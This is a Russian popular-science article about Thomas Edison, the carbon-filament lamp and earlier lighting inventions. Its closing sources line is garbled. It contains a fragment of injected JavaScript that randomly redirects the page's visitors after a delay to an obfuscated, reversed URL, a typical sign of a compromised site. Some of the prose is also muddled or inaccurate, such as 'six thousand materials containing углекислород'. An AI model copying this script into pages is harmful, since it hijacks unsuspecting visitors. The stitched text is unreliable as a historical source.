Знаете ли вы, что на изобретение лампы накаливания с угольной нитью у Томаса Эдисона ушло более пяти лет и свыше тысячи попыток. Но сначала давайте разберемся, кто такой Эдисон и почему именно ему присваивают столь великую заслугу. Родившийся в семье эмигрантов из Канады, мальчик с детства был уверен в отсутствии способностей. Даже в школе, после всего лишь трех месяцев учебы, его попросили покинуть учебное заведение в силу своей «неспособности» – именно так считали учителя. Он обучался дома, и уже в возрасте девяти лет, после прочтения книги под названием «Экспериментальная философия», стал делать первые опыты.
Свой путь изобретателя Эдисон начал в достаточно раннем возрасте. Попытки решить проблему освещения предпринимались еще за 50 лет до этого, но ни одна из них не увенчалась успехом. Томас подошел к этому делу гораздо масштабнее. Он создал лабораторию и в течение трех лет им было изобретено свыше тысячи изобретений. Долгое время его мечта – мечта изобрести лампочку, которая работала бы от электричества – оставалась нереализованной.
Пробуя и пробуя снова найти уникальный способ создания электрического света, он перепробовал свыше шести тысяч материалов, содержащих углекислород, пока, наконец, 21 октября 1879 года он закончил свою работу, достигнув желаемого результата. Однако, своему успеху он частично обязан изысканиям своих предшественников. Так, изобретение лампочки происходило в несколько этапов.
Самая первая дуговая лампа накаливания была продемонстрирована ученым Хэмфри Дэви. В основе ее работы использовались блок батарей и два угольных стержня. Впервые электрических свет пришел на улицы городов, а уже 1835 году Джеймс Боуман Линдсей продемонстрировал постоянно действующую систему освещения.
В середине XIX века два немца обнаружили, что если выкачать весь воздух из длинной стеклянной трубки и пропустить через нее электрический ток, то можно получить свет. Так была изобретена трубка Гейслера – именно ее взяли за основу в создании современных люминесцентных ламп дневного света. Далее соревнование среди изобретателей ламп накалилось до предела, пока Томас Эдисон не взялся за разработку плотнее.
Он, в кругу своих коллег, обратил внимание на то, что нить можно делать из разных материалов. Однако, пробуя использовать углерод и платину, он остановился все же на углероде. Так была изобретена всем известная лампочка, хоть и после Эдисона продолжились поиски иного варианта освещения или модернизации уже созданных.
Кроме лампочки, мир обязан Эдисону и универсальным цоколем. Разработанный им цоколь (металлическая часть лампочки) и по сей день называется «цоколем Эдисона». Первоначально такие лампочки стоили очень дорого, однако в 2000-е годы стоимость светодиодных ламп упала практически на 85%.
К сожалению (или счастью), лампочка Эдисона ушла в историю прошлого века, а на смену ей пришло великое множество диодных, светодиодных и люминесцентных ламп различных типов освещения. Однако, лампочка Эдисона и по сей день жива. Так, в пожарном депо города Ливермор, штат Калифорния, до сих пор с 1901 года работает одна из самых старых электрических лампочек. Мощность этой лампочки всего 4 ватта – она дает свет, примерно равный свету трех свечек. А весь секрет такого долголетия в том, что ее никогда не выключают.
Источники: Википедия; andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andex.ru/turbo/fb.ru/s/article/255700/lampochka-edisona-ktobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-izobrel-pervuyu-lampochku-pochemu-vsya-slava-dostalas-edisonu” target=”_blank” rel=”noopener”>FB.RU